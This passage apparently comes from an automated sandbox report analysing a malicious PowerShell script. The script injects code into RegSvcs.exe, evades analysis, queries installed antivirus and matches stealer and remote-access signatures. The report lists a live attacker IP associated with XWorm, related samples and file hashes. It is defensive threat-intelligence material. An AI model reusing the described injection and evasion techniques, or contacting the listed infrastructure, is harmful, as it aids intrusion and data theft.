'pXBe9HFDtAdZotphcgbdt1jtfMAXkED5dptTH1HtOoBwh5VCyGpNPIeDaGpQRtHO5QEcup2bma2XS7Ndj7k2FVaPEumb1', 'Q1EltKwM1R3yq1zXEHilAmDHGT4S5fhl21UG'

              Persistence and Installation Behavior

              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Process information set: NOOPENFILEERRORBOX (53 identical entries)

              Malware Analysis System Evasion

              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 3628
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 3714
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Window / User API: threadDelayed 1757
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Window / User API: threadDelayed 8075
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5720  Thread sleep time: -5534023222112862s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3184  Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\conhost.exe  Last function: Thread delayed
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  File Volume queried: C:\ FullSizeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  File Volume queried: C:\ FullSizeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user\AppData\Roaming
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user\AppData
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user\AppData\Roaming\Microsoft
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user
              Source: RegSvcs.exe, 00000004.00000002.3914283892.000000000145B000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllx
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process information queried: ProcessInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process token adjusted: Debug
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 40E000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 410000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: FD6008
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              Source: Yara match  File source: 0.2.powershell.exe.1ac16030578.2.unpack, type: UNPACKEDPE
              Source: Yara match  File source: 0.2.powershell.exe.1ac16e49e40.0.unpack, type: UNPACKEDPE
              Source: Yara match  File source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match  File source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match  File source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match  File source: 00000004.00000002.3913764509.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: 00000000.00000002.1483546758.000001AC16DFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: 00000000.00000002.1483546758.000001AC16083000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: 00000004.00000002.3916503959.0000000003101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: 00000000.00000002.1483546758.000001AC15E57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: Process Memory Space: powershell.exe PID: 3600, type: MEMORYSTR
              Source: Yara match  File source: Process Memory Space: RegSvcs.exe PID: 3352, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match  File source: 0.2.powershell.exe.1ac16030578.2.unpack, type: UNPACKEDPE
              Source: Yara match  File source: 0.2.powershell.exe.1ac16e49e40.0.unpack, type: UNPACKEDPE
              Source: Yara match  File source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match  File source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match  File source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match  File source: 00000004.00000002.3913764509.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: 00000000.00000002.1483546758.000001AC16DFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: 00000000.00000002.1483546758.000001AC16083000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: 00000004.00000002.3916503959.0000000003101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: 00000000.00000002.1483546758.000001AC15E57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: Process Memory Space: powershell.exe PID: 3600, type: MEMORYSTR
              Source: Yara match  File source: Process Memory Space: RegSvcs.exe PID: 3352, type: MEMORYSTR

              MITRE ATT&CK Matrix (number of matching signatures in parentheses)

              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation (11) | DLL Side-Loading (1) | Process Injection (211) | Disable or Modify Tools (1) | OS Credential Dumping | Security Software Discovery (111) | Remote Services | Archive Collected Data (11) | Encrypted Channel (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
              Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (121) | LSASS Memory | Process Discovery (1) | Remote Desktop Protocol | Clipboard Data (1) | Non-Standard Port (1) | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Process Injection (211) | Security Account Manager | Virtualization/Sandbox Evasion (121) | SMB/Windows Admin Shares | Data from Network Shared Drive | Application Layer Protocol (1) | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Deobfuscate/Decode Files or Information (1) | NTDS | Application Window Discovery (1) | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Obfuscated Files or Information (1) | LSA Secrets | System Network Configuration Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Software Packing (2) | Cached Domain Credentials | File and Directory Discovery (2) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | DLL Side-Loading (1) | DCSync | System Information Discovery (13) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Source | Detection | Scanner | Label | Link
mhqxUdpe7V.ps1 | 10% | Virustotal | | Browse
mhqxUdpe7V.ps1 | 13% | ReversingLabs | Win32.Trojan.Generic |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
Source | Detection | Scanner | Label | Link
92.255.57.155 | 0% | Avira URL Cloud | safe |
              No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
92.255.57.155 | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.1504821903.000001AC25E46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1483546758.000001AC1700A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.1483546758.000001AC15C31000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000000.00000002.1483546758.000001AC15E57000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.1483546758.000001AC15C31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3916503959.0000000003101000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000000.00000002.1483546758.000001AC15E57000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000000.00000002.1483546758.000001AC163FF000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000000.00000002.1483546758.000001AC15E57000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000000.00000002.1483546758.000001AC1700A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.1504821903.000001AC25E46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1483546758.000001AC1700A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000000.00000002.1483546758.000001AC1700A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000000.00000002.1483546758.000001AC1700A000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
92.255.57.155 | unknown | Russian Federation | | 42253 | TELSPRU | true
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1577168
                                    Start date and time:2024-12-18 08:14:15 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 7m 25s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:9
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:mhqxUdpe7V.ps1
                                    renamed because original name is a hash value
                                    Original Sample Name:372ad160c5b235ae768490e898860d6797ba74b1ed8106496ffc5a7c1ccd464e.ps1
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winPS1@6/5@0/1
                                    EGA Information:
                                    • Successful, ratio: 50%
                                    HCA Information:
                                    • Successful, ratio: 92%
                                    • Number of executed functions: 14
                                    • Number of non-executed functions: 3
                                    Cookbook Comments:
                                    • Found application associated with file extension: .ps1
                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                    • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target powershell.exe, PID 3600 because it is empty
• Not all processes were analyzed; report is missing behavior information
Time | Type | Description
02:15:24 | API Interceptor | 7x Sleep call for process: powershell.exe modified
02:15:31 | API Interceptor | 8039604x Sleep call for process: RegSvcs.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
92.255.57.155 | anyrunsample.ps1 | Get hash | malicious | Unknown | Browse | 92.255.57.155/1/1.png
92.255.57.155 | https://reviewgustereports.com/ | Get hash | malicious | CAPTCHA Scam ClickFix, XWorm | Browse | 92.255.57.155/1/1.png
No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
TELSPRU | MiGFg375KJ.exe | Get hash | malicious | XWorm | Browse | 92.255.57.155
TELSPRU | anyrunsample.ps1 | Get hash | malicious | Unknown | Browse | 92.255.57.155
TELSPRU | sEOELQpFOB.lnk | Get hash | malicious | RedLine | Browse | 92.255.57.75
TELSPRU | ref095vq842r70_classement_atout_france.pdf.lnk.d.lnk | Get hash | malicious | RedLine, SectopRAT | Browse | 92.255.57.75
TELSPRU | fa20b849ebe7c53d59f3ed0fcfac8445ea08e7296af5a.exe | Get hash | malicious | Stealc | Browse | 92.255.57.89
TELSPRU | LXS5itpTK7.exe | Get hash | malicious | Stealc | Browse | 92.255.57.89
TELSPRU | SEejSLAS9f.exe | Get hash | malicious | Stealc | Browse | 92.255.57.89
TELSPRU | mMgFHz9PdG.exe | Get hash | malicious | Stealc | Browse | 92.255.57.89
TELSPRU | vCZfRWB1kd.exe | Get hash | malicious | Stealc | Browse | 92.255.57.89
TELSPRU | 1891f566c018182f1b5826b5fe2a05d6927aff15638d2.exe | Get hash | malicious | Stealc | Browse | 92.255.57.89
                                    No context
                                    No context
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):64
                                    Entropy (8bit):1.1628158735648508
                                    Encrypted:false
                                    SSDEEP:3:Nlllul5mxllp:NllU4x/
                                    MD5:3A925CB766CE4286E251C26E90B55CE8
                                    SHA1:3FA8EE6E901101A4661723B94D6C9309E281BD28
                                    SHA-256:4E844662CDFFAAD50BA6320DC598EBE0A31619439D0F6AB379DF978FE81C7BF8
                                    SHA-512:F348B4AFD42C262BBED07D6BDEA6EE4B7F5CFA2E18BFA725225584E93251188D9787506C2AFEAC482B606B1EA0341419F229A69FF1E9100B01DE42025F915788
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:@...e................................................@..........
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):6220
                                    Entropy (8bit):3.7295667045435508
                                    Encrypted:false
                                    SSDEEP:96:jm5sCQQOLgkvhkvCCtJhbBuDH6hbB1iDHx:jm5sLsJhvhI
                                    MD5:D98DB6FE96E16D81FE7D7F548BBE009C
                                    SHA1:39902225B1C203A864E4271EFF48705852566477
                                    SHA-256:3096733FEC3C64D0E9ABD9EC072662CB6CD10B7B9D93D4325A877BBBA63046BD
                                    SHA-512:1314BC241C8A6570009AA720B37955D658AE951A57E6DAC6D759FD3523FBE35A910899BAACC4EB502FA6C26BDED6C7ECA2A3DE16CEF9D287BF04CEFA8798A831
                                    Malicious:false
